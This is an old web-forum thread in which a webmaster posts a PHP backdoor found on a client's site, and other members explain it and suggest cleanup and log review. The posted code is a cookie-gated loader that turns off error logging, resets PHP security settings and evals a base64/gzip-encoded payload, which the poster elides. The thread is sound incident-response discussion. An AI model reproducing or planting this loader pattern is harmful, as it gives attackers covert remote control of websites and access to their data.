1. Home
  2. Forums Index
  3. Server Side / PHP Server Side Scripting 7:10 am Apr 28, 2026

Forum Moderators: coopster

Message Too Old, No Replies

Help reading virus

Found PHP file with virus, can anyone interept what it is doing?

         

Demaestro

10:20 pm on May 4, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



Hey all,

I am pretty weak at PHP but I have a client with a site that has an infected file in it.

I have grepped the site and I can't find anything referencing it but I still have to check some of the MD5 and Base64 stuff to make sure calls to this file aren't being obfuscated.

This is what is in the file.. does anyone recognize it or can anyone give me some insight into what it is doing.... my eye tells me it is trying to relax the PHP settings to allow it to hand off a bad file in a cookie or something but I am guessing here.

Also would anyone know how it would have gotten in there? Known PHP or Joomla exploit? Or is it more likely that someone with access to the site is infected with something?

Thanks for any time you spend..

****************File****************
error_reporting(0);


$language='eng';

$auth = 0;

$name='3b1147d920f9e49d74a60245e8323cbe';
$pass='febfb75ba8a3fe2067d774b849695ac2';

@ini_restore('safe_mode');
@ini_restore('open_basedir');
@ini_restore('safe_mode_include_dir');
@ini_restore('safe_mode_exec_dir');
@ini_restore('disable_functions');
@ini_restore('allow_url_fopen');

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
if(md5($_COOKIE['name'])=='6c18b2c7a92538f78160d3d096bba29f'){
eval(gzinflate(base64_decode('a huge freaking string'))); }

****************/File****************

eelixduppy

12:24 am on May 5, 2011 (gmt 0)



Do an echo of the string to see what they are executing: 

echo gzinflate(base64_decode('a huge freaking string'));


They have compressed PHP code that has also been encoded in base 64. Once they reverse that, they evaluate that code.

Also, seems like they restore all the default values for those configuration settings at top, which may have limited what they are able to do with the evaluated code had they not reset them.

Demaestro

3:51 pm on May 5, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



eelix,

That was a great suggestion. I ran it locally and echo'd out that string and it creates a bunch of forms, and tries to pre-populate them with data about the website.

It looks for specific files like "passw.dic" which I imagine is a default file for some CMS.

It also reads from configuration files to reveal db info and the like.

So I guess I get to change all that stuff now.

The good news is it doesn't seem to be trying to infect users' of the site, it is only trying to open the site up to a worse attack.

If any senior members want to have a look at the really long string I will sticky it to you.

Please don't ask if you aren't an established member, I am not looking to help spread this thing.

eelixduppy

8:06 pm on May 5, 2011 (gmt 0)



Be interested to know how it got there in the first place. I'm going to assume you are running some open-source software with a vulnerability that was exploited, perhaps?

>> md5($_COOKIE['name'])=='6c18b2c7a92538f78160d3d096bba29f'

A lookup of that hash produces nothing, I was really interested in knowing what name they chose for themselves to execute that code. It's some predefined name they would register with so that when they log in they get the details of your site without any other user noticing anything strange. Oh well, doesn't really matter what it is, as long as you're taking care of it now. :)

Demaestro

8:50 pm on May 5, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



So far I have removed the bad file, changed all passwords, changed all DB credentials.... and because the nature of the exploit I had a 3 month old copy of the site so I did a dif on them and I am still wading through that.

I now need to be sure someone didn't come in manually and change the action of any forms especially ones within the e-commerce component.

I took this site on to do a couple feature additions but I don't control the hosting, I opened a ticket with them and they said they have seen this same thing in a couple CMS's lately... makes me wonder if those were on the same shared server this site is on.

coopster

1:48 pm on May 6, 2011 (gmt 0)

WebmasterWorld Administrator 10+ Year Member



The bigger question is, how did the file get there in the first place? Have a look at the timestamp on the file and cross-reference (grep) your server logs (including ftp/sftp logs) for the timestamp as well as the file name (the filemtime may not indicate actual placement of the file in the file system).

Demaestro

2:28 pm on May 6, 2011 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member Top Contributors Of The Month



coop,

That is something I am going to be doing today. I am very curious as to how it got there. My suspicions are that it came from a backdoor from another shared site on the server but I am guessing.

This is the first time I have ever dealt with this in over 10 years. It makes me want to go hug my systems admin.
 

Join The Conversation

Moderators and Top Contributors

Hot Threads This Week

  1. Home
  2. Forums Index
  3. Server Side / PHP Server Side Scripting 7:10 am Apr 28, 2026